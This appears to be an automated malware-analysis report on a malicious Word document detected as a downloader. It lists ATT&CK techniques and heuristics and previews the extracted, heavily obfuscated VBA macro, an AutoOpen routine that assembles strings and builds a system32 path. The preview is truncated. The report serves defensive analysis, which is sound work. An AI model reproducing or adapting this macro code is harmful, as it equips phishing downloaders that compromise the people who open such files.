MALICIOUS
228
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. Heuristics indicate the use of CreateObject, suggesting the macro likely downloads and executes a second-stage payload. ClamAV detection confirms its malicious nature as a downloader.
Heuristics 7
-
ClamAV: Doc.Downloader.Stratos-6923060-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Stratos-6923060-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 222571 bytes |
SHA-256: b586b915b86e15a6a8d1cdaff8a287666ee31127423e6236e6155808f3457323 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function vsumi(adoyfv11, ulaazy32, nuxii)
eyge = -133 * 179
End Function
Function hfpvvv(esvai, hyiy, ppmriadb)
oujjoezc = -36 - 95
vxiou = -15 - 108
ilpjgqtrza = -152 / 141
zvtujmo = -174 + 22
End Function
Function auzhaur(xlpuzf, vwvdtfvlmi, klxpoeyi)
bxfzwxqpvxvu = -160 / 178
End Function
Function sbiapyt(ecrauv)
hhfeu6 = -4 / 89
End Function
Function apghxd(mswdua, duipv)
wufweyil = -113 - 43
ounk = -168 * 22
End Function
Function emxse(eovlzge4, rume)
emryfvqbqfo = -127 / 55
End Function
Function izfgejt9(tpaqm)
yilwuywsxt = -34 - 99
End Function
Function ahsnxl(oeynl)
mxjrhmtplgap = -109 - 137
End Function
Function xiugie(yqeh, oqlnwww4, rqxjiet)
yxeh05 = -48 * 7
End Function
Function kpuiz70()
yyiuaf = -100 / 92
End Function
Function awzoia(taoojtc32, okac)
qpex = -55 - 145
ygejleqymv = -86 + 138
meeofm = -173 / 95
awwpdoi = -32 * 176
End Function
Function vdfsddio(cbuika)
aiuujyo = -27 * 130
bwoejtze = -174 + 61
Dim druyixd As Integer
druyixd = -148 / 20
ctisidayu = -165 / 117
End Function
Function spocsea(uksqq, umuict)
Dim ukra As String
ukra = -9 * 5
Dim uaeiuvwzzr As Integer
uaeiuvwzzr = -174 * 79
End Function
Function vrdycdv(eafklmx)
Dim urvhueoof As String
urvhueoof = -122 - 80
trraylrdeqw = -152 / 37
End Function
Sub AutoOpen()
yziygjcngmn = -171 - 149
kjdesir = "fpj+$hkougveut"
vtcnayl = -82 * 165
jixpju = -46 - 6
ajao = -62 - 174
edyub0 = -79 * 129
uadccre14 = "oyejjesgzt"
yaiot = -147 + 139
ohyhhuochy = -174 - 136
Dim yentcohkh As Integer
yentcohkh = -179 + 156
Dim exafszvfmi As String
exafszvfmi = -98 - 117
lvrceilf = -65 / 116
okfitx = "smgxi"
Dim iiiay As String
iiiay = -148 + 47
adayugkrzgp = -94 + 122
yuiov = "r+$soms"
nxepx = "iatsfoihvo"
ymhre = -155 + 91
auykm = -111 - 174
tosluyqk10 = "te"
qllabn = -40 + 87
uvjdodt = "mp"
iiavye = -177 * 55
aeasu81 = -125 / 39
iywnnbtdk23 = tosluyqk10 & uvjdodt
uoepn = -164 / 134
aabvixqbou = -92 / 102
Dim yccmyyxw As Integer
yccmyyxw = -57 / 76
widto = "isnbn"
yeldy = -161 + 47
geidzhpf = -178 - 54
lgmizm = -163 + 83
jyupu = -172 + 2
mlyqroz = "+$lnao"
Dim mvabbez As String
mvabbez = -83 * 126
xkestyxpnay = -28 - 52
nzxrxlyuj50 = -156 + 59
uuycvgd = "uuompyaewhzkizb+$ramr"
Dim kbwyanmjv, taelt, pqakjvj, qjnnhvyuisy As String
kbwyanmjv = -70 + 28
yovrxpyy = -170 / 119
asau6 = -65 * 152
kqjde = -173 * 15
cxtmfuindhb = -69 + 146
kfaywsmzr = "oiuilcqjlrkd"
uyuxbznx1 = -5 / 17
eovmzdon = -99 - 6
vqvpe70 = "u+$yryaieiiptwavdtmzu+$ee"
Dim dhsrvbuuvf As Integer
dhsrvbuuvf = -172 - 132
xjbsggz = -57 / 144
aiuaecc = Environ("SystemRoot")
sxyp2 = -2 * 34
iutvqoii = -127 / 138
hsneo = -91 + 151
muia = -46 * 57
plqyngt = kjdesir & uadccre14 & okfitx & yuiov & nxepx & widto & mlyqroz & uuycvgd & kfaywsmzr & vqvpe70
sfzgchn61 = -154 * 65
jdxnoagvdjxz5 = -91 - 12
Dim wwrzxyy As Integer
wwrzxyy = -95 + 113
miyxrbczzh4 = -25 - 33
Dim owxpqrl As String
owxpqrl = -102 + 7
qfhb = -167 + 115
wxvabajr = -81 / 37
nnidlvvv = -112 / 98
aiuaecc = aiuaecc + "\syste"
jujxan = -158 * 64
rxkui = -154 * 69
ahaiglu0 = -128 * 106
aairzklddxx = -25 * 37
sctuldej = -18 - 48
ooegl = -180 - 112
xjobomo = "m3"
nhwqshe = -125 - 98
niurbofxz = -155 * 142
Dim jdunmya, afbypd, aeouao, rnysdsiob6 As Integer
jdunmya = -152 * 72
oevlidlow0 = -164 * 77
uiiagzaomz = -111 - 178
aiuaecc = aiuaecc + xjobomo
oxue = -51 * 73
Dim yuau As Integer
yuau = -150 * 148
ajaxh = -123 * 67
uyajqcsxz1 = -104 - 96
mndlqriyi7 = -160 + 91
eoieapv = -31 / 45
nphhiuwm = "ayvyojsiulpq="
potagheynr4 = -107 + 149
oumoyzbvp = -91 / 121
dqqlap = -146 + 57
uemetfr = "'ecu';$ar"
gvpqywy = -106 * 31
giqxsqeia = -145 - 63
uyeuj = -171 - 174
iohfyi = "uyvmkaeibnf"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.